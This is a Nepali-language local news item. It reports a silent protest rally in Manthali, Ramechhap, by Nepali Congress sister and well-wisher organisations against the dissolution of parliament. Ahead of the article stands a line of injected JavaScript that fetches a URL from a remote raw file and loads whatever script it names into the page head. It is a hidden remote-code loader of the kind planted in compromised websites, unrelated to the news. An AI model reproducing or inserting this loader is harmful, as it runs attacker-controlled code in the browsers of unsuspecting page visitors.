;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ २४,
रामेछाप । रामेछापमा नेपाली काँग्रेसका शुभेच्छुक संस्थाहरुले आज (शनिबार) संसद् विघटनको विरोधमा मौन प्रदर्शन गर्दैछन् ।
कांग्रेसको भातृ संस्था नेपाल टेड्र युनियन रामेछापको, नेपाल प्रेस युनियन रामेछाप, नेपाली कांग्रेस रामेछाप ,शिक्षक संघ रामेछापसहित तरुण दल रामेछाप, नेपाल विद्यार्थी संघ रामेछापको, किसान संघ रामेछापलगाएत कांग्रेसका सम्पूर्ण भातृ संस्थाहरुको आयोजनामा विरोध र्याली प्रर्दशन गरिएको हो ।
मन्थलीको वीपी चोकबाट सुरु भएको मौन र्याली देवकोटचोक- कटहरको बोटमा पुगी उधोग वाणिज्य संघको भनवको बाटो हुदै जिल्ला प्रशासन कार्यालय रामेछाप संघारबाट शिक्षक संघको भवनमा पुगी कोण सभामा परिणत भएको थियो ।
प्रर्दशनमा सहभागीहरुले प्लेकार्डहरु प्रर्दशन गरेका थिए । कोण सभालाई टेड्र युनियन रामेछाप, नेपाल प्रेस युनियन रामेछाप, नेपाली कांग्रेस रामेछाप ,शिक्षक संघ रामेछापसहितका प्रमुख तथा प्रतिनिधिहरुले सम्बोधन गरेका थिए ।
माघ १३ गते बसेको काँग्रेस केन्द्रीय कार्यसमिति बैठकले सरकारविरुद्धको तेस्रो चरणको आन्दोलनमा भ्रातृ संगठन र शुभेच्छुक संगठनहरुलाई देशभर प्रदर्शनमा उतार्ने निर्णय गरेको थियो । मातृ पार्टीको सोही निर्देशन अनुसार १८ शुभेच्छुक संस्थाले आज ७७ वटै जिल्लामा सरकारविरुद्ध प्रदर्शन गरेका हुन् ।
फेसबुक प्रतिक्रियाहरु